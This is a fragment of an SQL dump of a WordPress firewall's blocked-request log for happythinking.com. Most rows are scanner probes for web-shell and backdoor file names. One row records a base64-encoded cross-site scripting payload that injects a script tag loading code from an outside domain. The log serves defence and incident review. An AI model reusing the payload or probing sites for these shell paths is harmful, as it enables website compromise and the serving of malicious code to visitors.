(50791, 1711999893.771580, 1711999893.281900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/about.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(50841, 1712062391.392008, 1712062390.896400, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-conflg.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbmZsZy5waHA=","category":"brute-force","ssl":1}'),
(50839, 1712011437.785380, 1712011437.350000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/travelscape/json.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL3RyYXZlbHNjYXBlL2pzb24ucGhw","category":"brute-force","ssl":1}');
INSERT INTO `wpou_wfhits` VALUES
(50792, 1711999873.153361, 1711999872.465400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/b0x.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2IweC5waHA=","category":"brute-force","ssl":1}'),
(50838, 1712011439.807811, 1712011439.333200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\þ{', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/themes/aahana/json.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2FhaGFuYS9qc29uLnBocA==","category":"brute-force","ssl":1}'),
(50902, 1712082627.201154, 1712082626.487800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/text.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3RleHQucGhw","category":"brute-force","ssl":1}'),
(50842, 1712062390.034082, 1712062389.512300, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/wp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLnBocA==","category":"brute-force","ssl":1}'),
(50900, 1712082215.110523, 1712082214.648700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/admin.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(50901, 1712082208.008805, 1712082207.581100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JlcGVhdGVyLnBocA==","category":"brute-force","ssl":1}'),
(52031, 1712689556.994891, 1712689556.616500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-login.php?action=register', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(52032, 0.000000, 1712700401.720712, '\0\0\0\0\0\0\0\0\0\0ÿÿO‘{Ö', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(52033, 1712726561.426852, 1712726550.622900, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œEv', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-content/plugins/fix/up.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9maXgvdXAucGhw","category":"brute-force","ssl":1}'),
(52038, 1712762153.942874, 1712762153.266700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/mail.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21haWwucGhw","category":"brute-force","ssl":1}'),
(52034, 1712726516.548415, 1712726515.963600, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œEv', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-content/plugins/pwnd/pwnd.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9wd25kL3B3bmQucGhw","category":"brute-force","ssl":1}'),
(52025, 1712689646.761765, 1712689646.330400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/ae.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FlLnBocA==","category":"brute-force","ssl":1}'),
(52026, 1712689628.801734, 1712689628.465000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/xmrlpc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3htcmxwYy5waHA=","category":"brute-force","ssl":1}'),
(52036, 0.000000, 1712749632.996539, '\0\0\0\0\0\0\0\0\0\0ÿÿMÝ›í', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.happythinking.com/wp-login.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(52037, 1712756728.708283, 1712756728.252800, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹¢‚', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-json/litespeed/v1/cdn_status', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:waf', 'XSS: Cross Site Scripting', '{"learningMode":0,"failedRules":"9","paramKey":"cmVxdWVzdC5ib2R5W3Jlc3VsdF1bX21zZ10=","paramValue":"PHNjcmlwdCBzcmM9aHR0cHM6Ly9jZG4ubWVkaWFqc2RlbGl2ZXJ5LmNvbT48L3NjcmlwdD4=","path":"L3dwLWpzb24vbGl0ZXNwZWVkL3YxL2Nkbl9zdGF0dXM=","category":"xss","ssl":1}'),
(52027, 1712689605.567669, 1712689605.256300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/plugins.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3BsdWdpbnMucGhw","category":"brute-force","ssl":1}'),
(52028, 1712689589.999158, 1712689589.576800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/radio.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JhZGlvLnBocA==","category":"brute-force","ssl":1}'),
(52029, 1712689580.230649, 1712689579.865600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/updates.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZGF0ZXMucGhw","category":"brute-force","ssl":1}'),
(52035, 1712726497.560844, 1712726496.861400, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œEv', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-content/plugins/shell/about.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaGVsbC9hYm91dC5waHA=","category":"brute-force","ssl":1}'),
(52030, 1712689561.477068, 1712689561.099000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/404.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"LzQwNC5waHA=","category":"brute-force","ssl":1}'),
(52039, 1712762126.549217, 1712762126.098800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(52024, 1712689665.093995, 1712689664.721900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/moon.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21vb24ucGhw","category":"brute-force","ssl":1}'),
(52023, 1712689673.113455, 1712689672.830600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/blog.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jsb2cucGhw","category":"brute-force","ssl":1}'),
(52040, 1712762110.541604, 1712762109.849300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/log.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2xvZy5waHA=","category":"brute-force","ssl":1}'),
(52017, 1712689805.068492, 1712689804.555200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/dropdown.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
(52045, 1712761997.099568, 1712761996.771900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(52016, 1712689821.807857, 1712689821.390000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/makeasmtp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21ha2Vhc210cC5waHA=","category":"brute-force","ssl":1}'),
